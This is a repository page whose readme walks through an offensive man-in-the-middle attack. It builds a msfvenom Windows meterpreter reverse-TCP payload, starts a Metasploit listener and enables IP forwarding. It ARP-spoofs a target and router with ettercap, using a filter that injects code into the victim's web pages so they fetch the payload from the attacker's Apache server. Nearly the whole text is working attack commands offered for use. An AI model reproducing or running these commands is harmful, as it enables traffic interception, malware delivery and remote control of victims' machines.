Menu

Tree [2c9c84] master /
 History

HTTPS access


File Date Author Commit
 iframe.eft 2016-09-21 pedr0 pedr0 [2c9c84] ALPHA VERSION - PLANNING
 image.png 2016-09-21 pedr0 pedr0 [2c9c84] ALPHA VERSION - PLANNING
 readme 2016-09-21 pedr0 pedr0 [2c9c84] ALPHA VERSION - PLANNING

Read Me

# ---
# Author: r00t-3xp10it | 6-mar-2016
# ettercap filter to inject one payload into target webpage request
# 'under MitM attacks' replacing the html tag </title> by our code,
# befor sending the webpage requested to target machine!
# REMMENBER TO REPLACE THE 'IP ADDRESS' IN THIS EXAMPLE BY YOUR BOX 'IP ADDRESS'
# REMMENBER TO EDIT ETTER.DNS (redirect domain to your apache2)
# REMMENBER TO EDIT ETTER.DNS AND UN-COMMENT THE FIELD: 'if you use ip_tables'
# ---


# BUILD MSFVENOM BINARY PAYLOAD (.exe)
sudo msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.67 LPORT=666 -f exe > /root/payload.exe


# START MULTI-HANDLER (listenner)
msf> use exploit/multi/handler
msf> set payload windows/meterpreter/reverse_tcp
msf> set LHOST 192.168.1.67
msf> set LPORT 666
msf> exploit



# compile iframe.eft filter into iframe.ef
sudo etterfilter /root/iframe.eft -o /root/iframe.ef


# copy files to apache2 webroot
sudo cp /root/payload.exe /var/www/html
sudo cp /root/image.png /var/www/html


# START APACHE2 SERVICE
/etc/init.d/apache2 start


# ip_forwarding
echo "1" > /proc/sys/net/ipv4/ip_forward


# run ettercap mitm+filter
sudo ettercap -T -q -i wlan0 -F /root/iframe.ef -M ARP /targetip/ /routerip/



# IF YOUR PC USES IPV6 THEN USE THIS CONFIG INSTEAD OF THE ABOVE CODE
# sudo ettercap -T -q -i wlan0 -F /root/iframe.ef -M ARP /targetip// /routerip//